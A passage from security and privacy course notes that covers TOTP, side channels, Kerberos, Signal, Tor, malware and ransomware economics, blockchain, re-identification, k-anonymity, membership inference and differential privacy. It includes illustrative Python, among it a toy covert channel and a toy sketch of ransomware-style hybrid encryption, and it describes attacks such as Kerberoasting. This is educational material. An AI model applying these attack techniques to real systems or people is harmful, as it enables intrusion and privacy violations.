In detail, TOTP is computed in four steps. (1) Compute the time-step counter \(t = \lfloor T_{\text{unix}} / 30 \rfloor\), encoding the current 30-second window as an 8-byte big-endian integer. (2) Compute \(h = \text{HMAC-SHA1}(K, t)\), producing a 20-byte output. (3) Dynamic truncation: take the low 4 bits of the final byte as an offset \(o = h[19] \mathbin{\&} \text{0x0f}\), then extract 4 bytes starting at offset \(o\): \(P = (h[o] \mathbin{\&} \text{0x7f}) \,\|\, h[o+1] \,\|\, h[o+2] \,\|\, h[o+3]\) (the MSB is masked to avoid signed-integer issues). (4) Compute \(\text{TOTP} = P \bmod 10^6\).
For example, if \(K = \texttt{12345678901234567890}\) (ASCII) and the Unix time is 1111111109 (giving \(t = 37037036\)), the TOTP value is 081804. Both the client app and the server independently compute this value from the shared secret; agreement proves knowledge of \(K\) within the current or adjacent time window.
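The four steps above, with the RFC 6238 test vector as a check:

```python
import hmac, hashlib, struct

def totp(key: bytes, unix_time: int, digits: int = 6, step: int = 30) -> str:
    t = unix_time // step                                # (1) time-step counter
    msg = struct.pack(">Q", t)                           #     8-byte big-endian
    h = hmac.new(key, msg, hashlib.sha1).digest()        # (2) 20-byte HMAC-SHA1
    o = h[19] & 0x0F                                     # (3) dynamic truncation
    p = struct.unpack(">I", h[o:o + 4])[0] & 0x7FFFFFFF  #     31-bit integer
    return str(p % 10**digits).zfill(digits)             # (4) decimal code

# RFC 6238 test vector: ASCII key "12345678901234567890", time 1111111109.
assert totp(b"12345678901234567890", 1111111109) == "081804"
```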
TOTP is phishable: an attacker who tricks a user into entering their TOTP code on a fake site can relay it to the real site within the 30-second window. FIDO2/WebAuthn is not phishable because the cryptographic challenge is bound to the site’s origin URL — a key registered for bank.com will not respond to a challenge from evil-bank.com, even if the user is deceived about which site they are visiting.
Side-Channel Attacks
Implementations leak information through physical channels — timing, power draw, electromagnetic emanation — even when the underlying mathematics is sound. Power analysis: on embedded devices (smart cards, HSMs), the current drawn during computation correlates with the data being processed. Simple Power Analysis (SPA) reads off the key directly from a single power trace; Differential Power Analysis (DPA, Kocher 1999) uses statistical averaging across many traces to isolate key-dependent signals even in the presence of noise. DPA broke the AES implementations in many commercial smart cards.
The countermeasure for these attacks is constant-time implementation: all branches, memory accesses, and arithmetic operations must take exactly the same time regardless of the secret values. The NaCl/libsodium library and all modern TLS implementations enforce this; OpenSSL’s historical CBC decryption code had timing vulnerabilities (Lucky Thirteen, 2013). The lesson: a cryptographic algorithm is secure only if its implementation is also secure — correctness of the mathematics does not guarantee security of the code.
Authentication Protocols
Challenge-response authentication: the prover demonstrates knowledge of a secret by computing a response to a server-generated nonce, without transmitting the secret. This prevents replay attacks.
Kerberos is a symmetric-key authentication protocol used in enterprise Active Directory environments. The Key Distribution Center (KDC) has two components: the Authentication Server (AS), which issues a Ticket-Granting Ticket (TGT) upon initial login, and the Ticket-Granting Server (TGS), which issues service tickets. The AS reply is encrypted with the user’s password-derived key, while service tickets are encrypted with the service account’s key; Kerberoasting attacks exploit the latter by requesting service tickets and brute-forcing the service account’s password offline.
OAuth 2.0 is an authorisation framework (not authentication). OIDC (OpenID Connect) layers identity on top of OAuth 2.0 with a signed ID token (JWT). SAML is an XML-based alternative used in enterprise SSO. Common vulnerabilities: confused deputy (SSRF via redirect URI), token theft via open redirects, JWT algorithm confusion (accepting alg: none).
Security Through the Layers
IPsec secures IP-layer communications. Transport mode protects the payload only (headers visible); tunnel mode encapsulates the entire original packet (used for VPNs). AH (Authentication Header) provides integrity only; ESP (Encapsulating Security Payload) provides both encryption and integrity.
DNSSEC signs DNS records with public-key signatures (commonly RSA or ECDSA), creating an authenticated chain from the root zone down. It protects against cache poisoning (Kaminsky attack) but not against a malicious resolver or DDoS against the authoritative server.
BGP security: BGP has no built-in authentication; autonomous systems announce prefixes and peers accept them. BGP hijacking (e.g., Pakistan Telecom’s 2008 YouTube blackhole, the 2010 China Telecom incident intercepting US traffic) exploits this. RPKI (Resource Public Key Infrastructure) cryptographically validates that an AS is authorised to announce a given prefix.
Email security stack: SPF (Sender Policy Framework) lists authorised sending IPs for a domain in DNS TXT records; DKIM (DomainKeys Identified Mail) adds a signature over the message header and body; DMARC (Domain-based Message Authentication, Reporting, and Conformance) specifies policy when SPF/DKIM fail. Together they mitigate email spoofing, though DMARC adoption is incomplete.
Chapter 4: Secure Messaging and Anonymity
Transport-layer encryption (TLS) protects data between a client and a server, but the server sees plaintext. End-to-end encryption (E2EE) means only the communicating endpoints can read messages — the service provider sees only ciphertext.
Off-the-Record Messaging
OTR (Off-the-Record Messaging), designed by Borisov, Goldberg, and Brewer (2004), pioneered the properties now expected of secure messengers:
- Perfect forward secrecy: a new ephemeral Diffie-Hellman key pair is negotiated for each conversation session. Compromise of long-term keys does not expose past messages.
- Deniability: after a message is sent, OTR publishes the MAC key used to authenticate it. Since anyone who saw the MAC key could forge a valid-looking message, the receiver cannot prove to a third party that the sender actually sent it. This contrasts with digital signatures, which are cryptographically non-repudiable.
- Key continuity: OTR keeps a “key fingerprint” to detect man-in-the-middle attacks across sessions.
Signal Protocol
The Signal Protocol (Marlinspike and Perrin) is the basis for Signal, WhatsApp, and Facebook Messenger’s secret conversations. It extends OTR with stronger security properties.
X3DH (Extended Triple Diffie-Hellman) is the initial key agreement: the initiator combines four DH computations involving identity keys, signed pre-keys, and one-time pre-keys, achieving mutual authentication and forward secrecy from the first message.
The Double Ratchet Algorithm manages ongoing message keys:
- A Diffie-Hellman ratchet advances whenever a new DH public key is received, providing break-in recovery (future messages are secure even if a session key is compromised).
- A symmetric ratchet (chain key advancing via HMAC) derives individual message keys, providing forward secrecy within a DH epoch.
Sealed sender hides the sender’s identity from the Signal server. Safety numbers (key fingerprints) allow out-of-band verification to detect MITM.
Forward secrecy means that compromise of a current key does not expose past messages. The symmetric ratchet (KDF chain) achieves this within a DH epoch: each message key is derived from the chain key via a one-way KDF, and the chain key is immediately advanced and the old key deleted. An attacker who captures the chain key at time \(t\) can derive message keys at times \(t, t+1, t+2, \ldots\) but cannot reverse the KDF to recover message keys at times \(t-1, t-2, \ldots\) — those are forward secret.
Break-in recovery (post-compromise security or future secrecy) means that a recovered session state becomes secure again once new DH keys are exchanged. The DH ratchet achieves this: each time Alice receives a message with a new DH public key from Bob, she advances the DH ratchet — computing a new ECDH shared secret incorporating fresh randomness that the attacker who compromised the old state does not know. This injects new unpredictable entropy into the chain key, “healing” the compromise for all future messages.
The combination is elegant: the symmetric ratchet provides fine-grained, efficient per-message forward secrecy (one KDF call per message, no new DH computation), while the DH ratchet provides occasional break-in recovery (one new DH key pair per received message). The protocol’s security analysis proves that an attacker who compromises the state at step \(t\) and then observes all future transmissions cannot distinguish any message sent after the next DH ratchet step from a uniformly random string.
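The symmetric ratchet above can be sketched in a few lines. This is a minimal KDF-chain sketch using HMAC-SHA256; the domain-separation labels 0x01/0x02 are illustrative stand-ins, not Signal's exact constants.

```python
import hashlib
import hmac

def kdf_chain_step(chain_key: bytes) -> tuple[bytes, bytes]:
    # Derive a message key and the next chain key from the current chain
    # key via one-way HMAC calls (labels 0x01/0x02 are illustrative).
    message_key = hmac.new(chain_key, b"\x01", hashlib.sha256).digest()
    next_chain_key = hmac.new(chain_key, b"\x02", hashlib.sha256).digest()
    return message_key, next_chain_key

# Forward secrecy: the old chain key is overwritten after each step, and
# HMAC cannot be inverted to recover earlier message keys from later state.
ck = hashlib.sha256(b"shared secret from DH ratchet").digest()
keys = []
for _ in range(3):
    mk, ck = kdf_chain_step(ck)
    keys.append(mk)
assert len(set(keys)) == 3  # distinct per-message keys
```

An attacker who steals `ck` after the loop can derive future keys but, because each step is a one-way function, none of the three keys already produced.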
Tor Network
Onion routing provides network-layer anonymity by layering encryption across a series of relays. The Tor design (Dingledine, Mathewson, Syverson 2004) uses a three-hop circuit:
- Guard relay (entry node): knows the client’s IP but not the destination.
- Middle relay: knows neither the client’s IP nor the destination.
- Exit relay: knows the destination but not the client’s IP.
Each relay decrypts one layer of encryption (like peeling an onion). The client extends the circuit incrementally using Diffie-Hellman with each relay. Traffic between relays uses TLS; cells are fixed-size (512 bytes) to limit traffic analysis.
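Layered encryption can be illustrated with a toy sketch: a SHA-256 counter-mode keystream stands in for Tor's AES-CTR, and hard-coded hop keys stand in for keys negotiated via per-hop Diffie-Hellman.

```python
import hashlib

def keystream(key: bytes, n: int) -> bytes:
    # Toy counter-mode keystream (stand-in for AES-CTR).
    out, counter = b"", 0
    while len(out) < n:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:n]

def xor_layer(key: bytes, data: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))

# The client wraps the payload in three layers, exit key first and guard
# key last, so each relay peels exactly one layer.
hop_keys = [b"guard-key", b"middle-key", b"exit-key"]
cell = b"GET example.com"
for key in reversed(hop_keys):
    cell = xor_layer(key, cell)
for key in hop_keys:            # each relay removes its own layer
    cell = xor_layer(key, cell)
assert cell == b"GET example.com"
```

No single relay sees both the client and the plaintext destination: the guard removes only the outermost layer, the exit only the innermost.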
.onion hidden services route traffic through a rendezvous point, keeping both client and server IP addresses hidden. The service’s address is the hash of its public key.
Tor’s limitations: a global passive adversary who can observe both ends of a circuit can perform timing correlation to deanonymise users. Website fingerprinting (see below) also undermines Tor’s privacy guarantees for web browsing.
Encrypted Traffic Analysis and Website Fingerprinting
Even when traffic is encrypted, an adversary observing packet sizes, inter-arrival times, and directions can fingerprint which website a user is visiting — including over Tor. The intuition is that each web page has a characteristic “loading profile” of objects, sizes, and timing.
Modern attacks use machine learning classifiers trained on traffic traces; closed-world accuracy above 95% is achievable in research settings. Deep-learning attacks such as Deep Fingerprinting (DF) show that Tor's fixed cell size alone is insufficient as a defence.
Defences include:
- Traffic shaping: padding packets to fixed-length patterns
- Constant-rate cover traffic: send dummy packets to create uniform traffic
- WTF-PAD (Website Traffic Fingerprinting Padding): adaptive padding framework whose ideas informed the circuit-padding defences adopted by Tor
Network Steganography
Steganography hides the existence of a communication (unlike encryption, which hides its content). Network steganography encodes covert messages in protocol fields (unused IP header bits, TCP ISN, timing intervals) or traffic patterns. Applications include covert channels in corporate networks and censorship circumvention.
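As a toy example of a protocol-field covert channel, the sketch below hides one message bit in the low bit of each packet's IP Identification field; the packet ID values here are synthetic.

```python
def embed(bits, ids):
    # Hide one covert bit in the low bit of each IP Identification value.
    return [(i & ~1) | b for i, b in zip(ids, bits)]

def extract(ids):
    return [i & 1 for i in ids]

cover_ids = [0x1A2B, 0x3C4D, 0x5E60, 0x7F81]  # IDs of innocent-looking packets
secret = [1, 0, 1, 1]
stego_ids = embed(secret, cover_ids)
assert extract(stego_ids) == secret
# The carrier packets are almost unchanged, so casual inspection sees
# ordinary traffic; only the low bits differ.
```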
Censorship Circumvention
The Great Firewall of China (GFW) employs deep packet inspection (DPI) to identify and block Tor, VPNs, and other circumvention traffic by their protocol fingerprints. Techniques include IP/domain blocklists, TLS fingerprinting, active probing of suspected proxies, and DNS poisoning.
Pluggable transports disguise Tor traffic as innocent-looking traffic:
- obfs4: adds random-looking padding and handshake to resist DPI
- meek: encapsulates traffic in HTTPS requests to CDN-hosted domain-fronted servers (e.g., Google, Cloudflare), making blocking require blocking the CDN itself
- Shadowsocks: lightweight SOCKS5 proxy with symmetric encryption; widely used in China
The censorship circumvention landscape is a continuous cat-and-mouse game: as each transport is fingerprinted and blocked, new ones are developed.
Chapter 5: Malware and Blockchain
Malware Taxonomy
Malicious software encompasses a range of threat categories. A virus attaches to legitimate programs and replicates when executed. A worm self-replicates across networks without user interaction (e.g., WannaCry, 2017). A Trojan masquerades as legitimate software. Ransomware encrypts victim files and demands payment (often in cryptocurrency). A rootkit hides malicious processes by subverting the OS kernel. Spyware exfiltrates data silently. Botnets are networks of compromised machines (bots) controlled remotely.
Botnet Architecture
A botnet requires a command-and-control (C&C) channel:
- Centralised (IRC/HTTP): simple, but single point of failure; takedown of the C&C server incapacitates the botnet
- Decentralised (P2P): resilient; bots find peers via DHT; harder to sinkhole
- Fast-flux DNS: rapidly rotating DNS records point to proxy bots, obscuring the true C&C location; double-flux rotates both A records and NS records
Sinkholing redirects botnet C&C domains to a controlled server, allowing researchers to count infected machines and cut off botmaster control. McColo Corp (2008): a hosting provider used by major spam botnets; when two upstream ISPs severed connectivity, global spam volume dropped approximately 75% within hours — demonstrating how much spam infrastructure was centralised there.
Ransomware Economics
Modern ransomware (REvil, DarkSide, LockBit) operates as Ransomware-as-a-Service (RaaS): the ransomware authors lease the malware and infrastructure to affiliates who conduct intrusions and split the ransom. Ransoms are denominated in Bitcoin or Monero for pseudonymity.
Double extortion emerged around 2019: attackers not only encrypt files but exfiltrate data and threaten to publish it, giving victims an additional reason to pay even if they have backups. The correct defensive posture includes offline backups (air-gapped or immutable), network segmentation, and IR planning.
Encryption: WannaCry generates a per-file AES-128 key, encrypts the file in CBC mode, then RSA-encrypts the AES key with the attacker’s public key (RSA-2048). Only the attacker’s private key can recover the AES keys, and hence the files. The AES-128 with fresh per-file keys and CBC mode was reasonably implemented — there was no practical weakness in this layer.
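The hybrid scheme can be sketched as follows. Purely for illustration, textbook RSA with tiny primes and a SHA-256 XOR keystream stand in for WannaCry's RSA-2048 and AES-128-CBC.

```python
import hashlib

# Toy RSA key pair (textbook RSA with tiny primes, illustration only;
# WannaCry used RSA-2048 via the Windows CryptoAPI).
p, q = 61, 53
n, e, d = p * q, 17, 2753                 # d = e^-1 mod (p-1)(q-1)

def keystream(key: bytes, length: int) -> bytes:
    out, c = b"", 0
    while len(out) < length:
        out += hashlib.sha256(key + c.to_bytes(4, "big")).digest()
        c += 1
    return out[:length]

def stream_cipher(key: bytes, data: bytes) -> bytes:
    # XOR keystream cipher standing in for AES-128-CBC.
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))

plaintext = b"quarterly_report.xlsx contents"
file_key = 42                              # fresh per-file symmetric key
ciphertext = stream_cipher(bytes([file_key]), plaintext)
wrapped_key = pow(file_key, e, n)          # RSA-encrypt the file key

# Only the attacker's private exponent d can unwrap the file key:
recovered = pow(wrapped_key, d, n)
assert recovered == file_key
assert stream_cipher(bytes([recovered]), ciphertext) == plaintext
```

The structure explains why paying the ransom "works": victims hold the ciphertexts and wrapped keys, but only the attacker holds `d`.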
The catastrophic flaw: WannaCry generated its RSA key pair using the Windows CryptoAPI, and on Windows XP the API's cleanup routines failed to erase the prime factors of the RSA modulus from process memory. Security researcher Adrien Guinet discovered that by scanning the infected process's memory for these primes, the RSA private key could be reconstructed. Researchers built a tool (WannaKey) that did exactly this — allowing decryption without paying the ransom, on unpatched XP systems that had not been rebooted since infection.
The WannaCry kill switch — a single hardcoded domain that the worm queried and halted if resolvable — was discovered by researcher Marcus Hutchins, who registered the domain for $10.69 and thereby activated the kill switch globally, halting the spread within hours of its discovery. This single design oversight (the kill switch existed to detect analysis sandboxes, which often redirect all DNS queries to a local host) allowed the worm’s spread to be arrested without defeating its encryption.
The economics are striking: the Colonial Pipeline attack (DarkSide, 2021) resulted in a ransom of 75 Bitcoin (~$4.4M at the time), of which approximately 63.7 Bitcoin was later recovered by the FBI using a private key obtained through an investigation. The recovery demonstrated that Bitcoin is pseudonymous, not anonymous — blockchain analysis firms (Chainalysis, Elliptic) can trace transaction flows through the public ledger. Monero, which uses ring signatures, stealth addresses, and confidential transactions to provide strong anonymity, has become increasingly preferred for ransomware payments precisely because it is harder to trace. The OFAC (Office of Foreign Assets Control) has sanctioned specific cryptocurrency addresses associated with ransomware operators, making it illegal for US entities to pay ransoms to those addresses — though enforcement against international affiliates remains difficult.
Blockchain and Bitcoin
The Bitcoin whitepaper (Nakamoto 2008) describes a decentralised, trustless ledger secured by proof-of-work.
Data structure: transactions are grouped into blocks. Each block contains a Merkle tree of transactions (efficient membership proofs), a hash pointer to the previous block, a nonce, and a timestamp. The chain of hashes makes tampering computationally infeasible: altering a past block requires re-mining that block and all subsequent blocks.
Proof-of-Work: to add a block, a miner must find a nonce such that \(H(\text{block header}) < \text{target}\). The target is adjusted every 2016 blocks so that blocks arrive approximately every 10 minutes. Mining is probabilistic; the expected number of hashes is \(2^{256}/\text{target}\), so expected work is inversely proportional to the target (halving the target doubles the work).
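The mining loop itself is tiny. This is a minimal sketch with a deliberately easy toy target so the search finishes quickly; real Bitcoin headers have a fixed 80-byte layout.

```python
import hashlib

def mine(header: bytes, target: int) -> int:
    # Search for a nonce such that the double-SHA256 of (header || nonce),
    # read as a 256-bit integer, falls below the target.
    nonce = 0
    while True:
        digest = hashlib.sha256(
            hashlib.sha256(header + nonce.to_bytes(8, "big")).digest()
        ).digest()
        if int.from_bytes(digest, "big") < target:
            return nonce
        nonce += 1

# Expected work is 2**256 / target hashes: halving the target doubles it.
header = b"prev_hash|merkle_root|timestamp"
target = 2 ** 244                     # ~1 in 4096 hashes succeeds
nonce = mine(header, target)
winning = hashlib.sha256(
    hashlib.sha256(header + nonce.to_bytes(8, "big")).digest()
).digest()
assert int.from_bytes(winning, "big") < target
```

Verification is a single hash, which is the asymmetry proof-of-work relies on: finding the nonce is expensive, checking it is cheap.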
The UTXO (Unspent Transaction Output) model tracks coin ownership: each transaction consumes UTXOs as inputs and creates new UTXOs as outputs. There are no accounts; identity is a public key.
Double-spend attack (51% attack): an adversary controlling more than half the network’s hash rate can build a longer secret chain and later broadcast it, reversing confirmed transactions. The probability of success decreases exponentially with the number of confirmations.
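The attacker's catch-up probability can be computed directly from the formula in the Bitcoin whitepaper (section 11), assuming the honest chain is z confirmations ahead and the attacker holds fraction q of the hash rate.

```python
import math

def attacker_success(q: float, z: int) -> float:
    # Probability an attacker with hash-rate fraction q ever catches up
    # from z blocks behind (Nakamoto 2008, section 11).
    p = 1.0 - q
    lam = z * (q / p)
    s = 1.0
    for k in range(z + 1):
        poisson = math.exp(-lam) * lam ** k / math.factorial(k)
        s -= poisson * (1 - (q / p) ** (z - k))
    return s

# Success probability falls off exponentially with the confirmation count:
assert attacker_success(0.1, 0) == 1.0
assert attacker_success(0.1, 6) < 0.001   # whitepaper reports ~0.0002
```

This is why merchants conventionally wait for six confirmations before treating a payment as final.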
Ethereum and Proof-of-Stake
Ethereum extends Bitcoin with smart contracts — Turing-complete programs stored and executed on-chain in the EVM (Ethereum Virtual Machine). Contracts are written in Solidity. Each computation step costs gas, preventing infinite loops and incentivising efficiency.
The Ethereum Merge (September 2022) transitioned Ethereum from proof-of-work to Proof-of-Stake. Validators replace miners: to propose and attest to blocks, validators stake 32 ETH as collateral. Dishonest behaviour is punished by slashing (burning staked ETH). Energy consumption fell by approximately 99.95%.
Known Ethereum smart contract vulnerabilities:
- Reentrancy: a contract calls an external contract before updating its state; the external contract re-enters and drains funds. The DAO hack (2016) exploited this, stealing approximately 60M USD.
- Integer overflow/underflow: Solidity 0.8 introduced automatic overflow checking; earlier contracts used SafeMath libraries.
- Front-running (MEV): miners (now validators) can observe pending transactions and insert their own transactions ahead of them.
Mining Pool Centralisation
Solo mining has extremely high variance: a miner with 0.1% of the hash rate expects one block roughly every seven days on average (one in every 1000 blocks, at 144 blocks per day) but may wait months. Mining pools aggregate hash power, sharing rewards proportionally to submitted work (shares). The Stratum protocol coordinates miners with the pool server.
The consequence is extreme centralisation: a handful of pools (AntPool, F2Pool, Foundry) collectively control well over 50% of Bitcoin hash rate. GHash.io briefly exceeded 50% in 2014, demonstrating the theoretical feasibility of a 51% attack. This centralisation undermines Bitcoin's decentralisation premise.
Chapter 6: Inference Attacks and Syntactic Privacy
The Re-identification Problem
Releasing data with direct identifiers removed (name, SSN, email) is intuitively “anonymised” but frequently inadequate. Quasi-identifiers — combinations of seemingly innocuous attributes — can uniquely identify individuals.
AOL search logs (2006): AOL released 20 million search queries with user IDs replaced by random numbers. New York Times reporters identified user 4417749 as Thelma Arnold by correlating her searches for her name, neighbours, and medical conditions.
Netflix Prize dataset (Narayanan and Shmatikov 2008): Netflix released about 500,000 users’ movie ratings with usernames replaced by random IDs. Using the public IMDb database as auxiliary information, eight movie ratings (of which two could be completely wrong) with dates known to within 14 days sufficed to uniquely identify 99% of records in the dataset. The attack used a de-anonymisation algorithm based on the principle that an individual’s ratings form a unique fingerprint.
NYC Taxi dataset (2014): the NYC Taxi and Limousine Commission released trip data with medallion numbers hashed via MD5. Because the space of valid medallion numbers is tiny compared with MD5’s output space, brute-force enumeration of that space reversed all the hashes within minutes, linking trips to specific taxis and drivers.
Dataset Reconstruction Attacks
Given a statistical database that answers aggregate queries (counts, sums, means), can an attacker reconstruct the individual records? The Dinur-Nissim reconstruction theorem (2003) shows that if an adversary can issue polynomially many random subset-sum queries over \(n\) binary-valued records, and each response is accurate to within error \(o(\sqrt{n})\), then near-exact reconstruction of the database is possible via linear programming. This implies that publishing many accurate statistics with too little noise is fundamentally incompatible with privacy — a key motivator for differential privacy.
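A toy version of the reconstruction idea: exhaustive pair-sum queries and brute-force search stand in for the random-query and linear-programming machinery used at scale.

```python
import itertools
import random

random.seed(0)
n = 8
secret = [random.randint(0, 1) for _ in range(n)]

# The database answers exact subset-sum queries; here, every pairwise sum.
queries = list(itertools.combinations(range(n), 2))
answers = [secret[i] + secret[j] for i, j in queries]

# The adversary searches for any database consistent with the answers;
# exhaustive search over 2^n candidates stands in for linear programming.
consistent = [
    cand for cand in itertools.product([0, 1], repeat=n)
    if all(cand[i] + cand[j] == a for (i, j), a in zip(queries, answers))
]
assert consistent == [tuple(secret)]  # exact answers pin down every record
```

With exact answers the secret database is the unique consistent candidate; the theorem's force is that even noisy answers (error \(o(\sqrt{n})\)) leave essentially one candidate.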
k-Anonymity
A dataset is \(k\)-anonymous if every record is indistinguishable from at least \(k-1\) other records on the quasi-identifiers. k-Anonymity prevents linking attacks when the adversary knows an individual’s quasi-identifiers. However, it has critical weaknesses, as the following example illustrates.
| Name | Age | Gender | ZIP Code | Salary |
|---|---|---|---|---|
| Alice | 30 | F | 10001 | 80K |
| Bob | 32 | M | 10001 | 90K |
| Carol | 28 | F | 10002 | 75K |
The quasi-identifiers are \(\{\text{age}, \text{gender}, \text{ZIP code}\}\). As-is, each record is unique on these quasi-identifiers — an adversary who knows Alice’s age, gender, and ZIP can immediately identify her row and infer her salary.
To achieve \(k=2\) anonymity, we apply three transformations: (1) generalise age to the decade range [25–35]; (2) suppress the gender column entirely; (3) generalise ZIP code to the prefix 100** (masking the last two digits). The transformed dataset is:
| Age Range | Gender | ZIP Prefix | Salary |
|---|---|---|---|
| [25–35] | — | 100** | 80K |
| [25–35] | — | 100** | 90K |
| [25–35] | — | 100** | 75K |
Every record now matches the other two on the quasi-identifiers — in fact we have \(k = 3\), since all three records fall in the same generalised equivalence class. A linking attack using only (age range, ZIP prefix) cannot distinguish Alice from Bob or Carol.
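The example above can be checked mechanically. The helper below computes the smallest equivalence-class size over a chosen set of quasi-identifier columns; the column names are illustrative.

```python
from collections import Counter

def k_anonymity(records, quasi_identifiers):
    # Smallest equivalence-class size over the quasi-identifier columns.
    classes = Counter(tuple(r[c] for c in quasi_identifiers) for r in records)
    return min(classes.values())

raw = [
    {"age": 30, "gender": "F", "zip": "10001", "salary": "80K"},
    {"age": 32, "gender": "M", "zip": "10001", "salary": "90K"},
    {"age": 28, "gender": "F", "zip": "10002", "salary": "75K"},
]
assert k_anonymity(raw, ["age", "gender", "zip"]) == 1  # everyone unique

# Generalise: age -> decade range, gender suppressed, ZIP -> 3-digit prefix.
generalised = [
    {"age": "[25-35]", "zip": r["zip"][:3] + "**", "salary": r["salary"]}
    for r in raw
]
assert k_anonymity(generalised, ["age", "zip"]) == 3
```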
However, \(k\)-anonymity does not protect the sensitive attribute. Alice’s salary of 80K is still unique within the equivalence class. An attacker who knows that a person in this class earns 80K can immediately identify them. This residual disclosure is what \(\ell\)-diversity and \(t\)-closeness attempt to address: they require that the sensitive attribute (salary) is sufficiently diverse or distributed within each equivalence class, not merely that the quasi-identifiers are generalised.
Homogeneity attack: if all \(k\) records in an equivalence class share the same sensitive attribute value, the adversary learns that value with certainty, even without a linking attack.
Background knowledge attack: if the adversary knows something about an individual that further constrains which records in the equivalence class could be theirs, even diverse sensitive values may be disclosed.
Composition attack: suppose two independently \(k\)-anonymised releases cover overlapping populations, say one publishing (age, ZIP code) with gender suppressed and the other publishing (gender, ZIP code) with age generalised. An adversary links the two datasets on ZIP code. The combined quasi-identifier is \(\{\text{gender}, \text{age}, \text{ZIP code}\}\). Even if each individual dataset had \(k=3\), the combined equivalence classes may now contain only 1 or 2 records — uniquely identifying individuals. The k-anonymity guarantee for each dataset provides no protection against this composition attack. This failure mode is precisely why k-anonymity has no meaningful composition theorem, and why differential privacy — which composes predictably — is preferred.
l-Diversity
\(\ell\)-Diversity requires each equivalence class to contain at least \(\ell\) “well-represented” values of the sensitive attribute; in the simplest (distinct) form, at least \(\ell\) distinct values. With three possible diagnoses (cancer, flu, cold), distinct 3-diversity requires each equivalence class to contain all three — at least one record with each. Under this constraint, even knowing the target’s equivalence class, the adversary can only say the diagnosis is one of three possibilities, limiting information gain. However, l-diversity still does not account for the overall distribution: if only 5% of the population has cancer, a “diverse” equivalence class with 1 cancer and 2 flu/cold records raises the adversary’s belief that the target has cancer from a 5% prior to roughly 33%, a large information gain despite 3-diversity. This motivates t-closeness.
t-Closeness
An equivalence class satisfies \(t\)-closeness if the distribution of the sensitive attribute within the class is within distance \(t\) (commonly measured by Earth Mover’s Distance) of the attribute’s distribution in the overall table, preventing the distributional skew that defeats \(\ell\)-diversity.
Membership Inference Attacks
A membership inference attack asks whether a given record was part of a model’s training set, the machine-learning analogue of re-identification. Shokri et al. (2017) operationalised this into a full attack pipeline. The attacker first trains \(k = 64\) shadow models that mimic the target model’s behaviour — each shadow model is trained on a different random subset of a dataset drawn from the same distribution as the target’s training data. For each record in each shadow model’s training and test sets, the attacker observes the confidence vector \(f_\text{shadow}(x) \in [0,1]^C\) (where \(C\) is the number of classes). Shadow models trained on \(x\) tend to produce higher-confidence, more peaked vectors; shadow models not trained on \(x\) produce flatter, lower-confidence outputs. These (confidence vector, member/non-member) pairs become the training data for a binary attack classifier.
Against the target model, the attacker queries \(f_\theta(x)\), feeds the resulting confidence vector to the attack classifier, and obtains a membership prediction. Shokri et al. achieved over 80% attack accuracy on neural networks trained on Purchase-100 and Texas-100 hospital discharge datasets — well above the 50% random baseline. Defences include: output regularisation (temperature scaling, label smoothing), restricting the API to top-1 class labels only (removing confidence scores), and DP-SGD, which provides formal membership inference resistance proportional to \(e^\varepsilon\). The formal connection is tight: any \((\varepsilon, \delta)\)-DP mechanism bounds the adversary’s membership advantage to at most \(e^\varepsilon - 1 + \delta\).
Limitations of Syntactic Approaches
Syntactic privacy models share fundamental shortcomings. They provide no formal adversary model and offer no composability: releasing two k-anonymous datasets can jointly violate privacy. The set of quasi-identifiers must be specified in advance; in a world of rich auxiliary data, virtually any attribute combination can serve as a quasi-identifier. These limitations motivate the rigorous probabilistic framework of differential privacy.
Chapter 7: Differential Privacy and Private Machine Learning
Intuition and Formal Definition
Differential privacy formalises the intuition that no individual’s participation in a dataset should significantly change what an analyst can learn. Think of it as a promise: “your data could have been in or out of the dataset, and the output barely changes either way.”
Formally, a randomised mechanism \(M\) is \((\varepsilon, \delta)\)-differentially private if for all neighbouring datasets \(D, D'\) and all measurable sets of outputs \(S\), \(\Pr[M(D) \in S] \leq e^\varepsilon \Pr[M(D') \in S] + \delta\); when \(\delta = 0\) we say \(M\) is \(\varepsilon\)-DP. The two datasets \(D\) and \(D'\) are called neighbouring or adjacent. In the “add/remove” model, \(D'\) is obtained from \(D\) by adding or removing one person’s record. In the “substitution” model, \(D'\) replaces one person’s record with a different one. The two models differ slightly in their noise requirements but are equivalent up to a factor of 2 in \(\varepsilon\).
A classic warm-up is randomised response (Warner 1965), applied to a sensitive survey question such as “have you ever cheated on an exam?”: each student privately flips a fair coin; on heads they answer truthfully, and on tails they flip again, answering YES on heads and NO on tails. From the student’s perspective, privacy is guaranteed: regardless of the true answer, the student’s reported response is YES with probability at least \(1/4\) and NO with probability at least \(1/4\). No single response can be taken as definitive evidence. Formally, let the true probability of cheating be \(p\). The expected fraction of YES responses is
\[ \Pr[\text{YES}] = p \cdot \tfrac{1}{2} + (1-p) \cdot \tfrac{1}{4} + p \cdot \tfrac{1}{4} = \tfrac{p}{2} + \tfrac{1}{4}. \]Let \(\hat{q}\) denote the observed fraction of YES answers. Solving for \(p\): \(p = 2\hat{q} - \tfrac{1}{2}\). This is an unbiased estimator; with \(n\) students the standard error is \(O(1/\sqrt{n})\) — only a constant factor worse than direct surveying.
What is the formal DP guarantee? For any individual, the ratio of probabilities of saying YES versus NO is at most \(3:1\) (truthful YES has probability \(3/4\), truthful NO has probability \(1/4\)). Therefore this mechanism is \(\varepsilon\)-DP in the local model with \(\varepsilon = \ln 3 \approx 1.1\) — a strong, interpretable guarantee. Randomised response is arguably the oldest known local DP mechanism, predating the formal definition by four decades.
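A quick simulation of the mechanism and its unbiased estimator; the 0.3 cheating rate and the sample size are arbitrary choices for the demonstration.

```python
import random

def randomised_response(truth: bool, rng: random.Random) -> bool:
    # Warner-style randomised response: answer truthfully on heads;
    # on tails, flip again and answer YES/NO uniformly at random.
    if rng.random() < 0.5:
        return truth
    return rng.random() < 0.5

rng = random.Random(42)
p_true = 0.3                      # true fraction of "cheaters"
n = 100_000
responses = [randomised_response(rng.random() < p_true, rng) for _ in range(n)]
q_hat = sum(responses) / n        # observed YES fraction
p_hat = 2 * q_hat - 0.5           # unbiased estimate: p = 2q - 1/2
assert abs(p_hat - p_true) < 0.02
```

No individual response reveals the student's answer with certainty, yet the population estimate converges at the usual \(O(1/\sqrt{n})\) rate.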
Sensitivity and Basic Mechanisms
